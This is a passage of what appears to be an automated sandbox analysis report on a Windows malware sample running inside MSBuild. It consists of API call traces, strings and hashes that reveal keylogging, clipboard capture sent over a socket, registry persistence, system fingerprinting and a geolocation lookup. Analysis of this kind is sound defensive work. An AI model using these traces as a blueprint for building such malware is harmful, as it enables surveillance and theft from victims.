                                                                                                                                                                                    control_flow_graph 1588 40c89e-40c8c3 call 401e52 1591 40c8c9 1588->1591 1592 40c9ed-40ca85 call 401e07 GetLongPathNameW call 403b40 * 2 call 40cc37 call 402860 * 2 call 401e13 * 5 1588->1592 1593 40c8d0-40c8d5 1591->1593 1594 40c9c2-40c9c7 1591->1594 1595 40c905-40c90a 1591->1595 1596 40c9d8 1591->1596 1597 40c9c9-40c9ce call 43ac0f 1591->1597 1598 40c8da-40c8e8 call 41a74b call 401e18 1591->1598 1599 40c8fb-40c900 1591->1599 1600 40c9bb-40c9c0 1591->1600 1601 40c90f-40c916 call 41b15b 1591->1601 1603 40c9dd-40c9e2 call 43ac0f 1593->1603 1594->1603 1595->1603 1596->1603 1608 40c9d3-40c9d6 1597->1608 1621 40c8ed 1598->1621 1599->1603 1600->1603 1613 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1601->1613 1614 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1601->1614 1615 40c9e3-40c9e8 call 4082d7 1603->1615 1608->1596 1608->1615 1626 40c8f1-40c8f6 call 401e13 1613->1626 1614->1621 1615->1592 1621->1626 1626->1592
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LongNamePath
                                                                                                                                                                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                    • API String ID: 82841172-425784914
                                                                                                                                                                                    • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                                                                                                    • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                                                                                                    • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                                                                                                    • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenClipboard.USER32 ref: 00415A46
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                    • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2172192267-0
                                                                                                                                                                                    • Opcode ID: 20bbd8a9be223023429b86dd59441cf199e90aae28cc1759b9981102a65ca55e
                                                                                                                                                                                    • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 20bbd8a9be223023429b86dd59441cf199e90aae28cc1759b9981102a65ca55e
                                                                                                                                                                                    • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                    • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                    • API String ID: 3121278467-91888290
                                                                                                                                                                                    • Opcode ID: 6b4a09cc400eb253b86198db5e131c1a7ef1d480120042e2a6393a51d8aeec4d
                                                                                                                                                                                    • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b4a09cc400eb253b86198db5e131c1a7ef1d480120042e2a6393a51d8aeec4d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                                      • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                                                                      • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                      • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                      • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                    • API String ID: 782494840-2070987746
                                                                                                                                                                                    • Opcode ID: 5d31af5c97293a85370047cce484a292ea1466dd5cf4e4afe3e0a55efe7bfd96
                                                                                                                                                                                    • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d31af5c97293a85370047cce484a292ea1466dd5cf4e4afe3e0a55efe7bfd96
                                                                                                                                                                                    • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                      • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                      • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                      • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                    • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                    • String ID: `AG
                                                                                                                                                                                    • API String ID: 1958988193-3058481221
                                                                                                                                                                                    • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                                                                                                    • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                                                                    • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                                                    • String ID: HgF$pth_unenc
                                                                                                                                                                                    • API String ID: 1818849710-3662775637
                                                                                                                                                                                    • Opcode ID: ddbfc9346cb1df8603390f45d52edca88235b9551560ffb2f18b7b49edab08f4
                                                                                                                                                                                    • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                                                                                    • Opcode Fuzzy Hash: ddbfc9346cb1df8603390f45d52edca88235b9551560ffb2f18b7b49edab08f4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                      • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                      • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                      • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                      • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2152742572-0
                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                                                                                                                    • _free.LIBCMT ref: 00446F7D
                                                                                                                                                                                    • _free.LIBCMT ref: 00446FA4
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                    • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                    • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                                                                                                    • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002F4,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                    • SetEvent.KERNEL32(000002F4,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EventObjectSingleWaitsend
                                                                                                                                                                                    • String ID: LAL
                                                                                                                                                                                    • API String ID: 3963590051-3302426157
                                                                                                                                                                                    • Opcode ID: cd91422d9e85df6d743440515086c76da5eceecec014799576a9647d60b24de0
                                                                                                                                                                                    • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd91422d9e85df6d743440515086c76da5eceecec014799576a9647d60b24de0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                                                                                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                    • String ID: Offline Keylogger Started
                                                                                                                                                                                    • API String ID: 465354869-4114347211
                                                                                                                                                                                    • Opcode ID: 500aa7415aebb72bd48f6e411c5bff9981bb0a1ffcdd18614d34843fe97faccd
                                                                                                                                                                                    • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                                                                                                    • Opcode Fuzzy Hash: 500aa7415aebb72bd48f6e411c5bff9981bb0a1ffcdd18614d34843fe97faccd
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                    • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                                                    • String ID: TUF
                                                                                                                                                                                    • API String ID: 1818849710-3431404234
                                                                                                                                                                                    • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                    • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3360349984-0
                                                                                                                                                                                    • Opcode ID: d2078bbdedafa78d158801e22def40eedee31e1b3e7f026a31dda055cca84df3
                                                                                                                                                                                    • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2078bbdedafa78d158801e22def40eedee31e1b3e7f026a31dda055cca84df3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
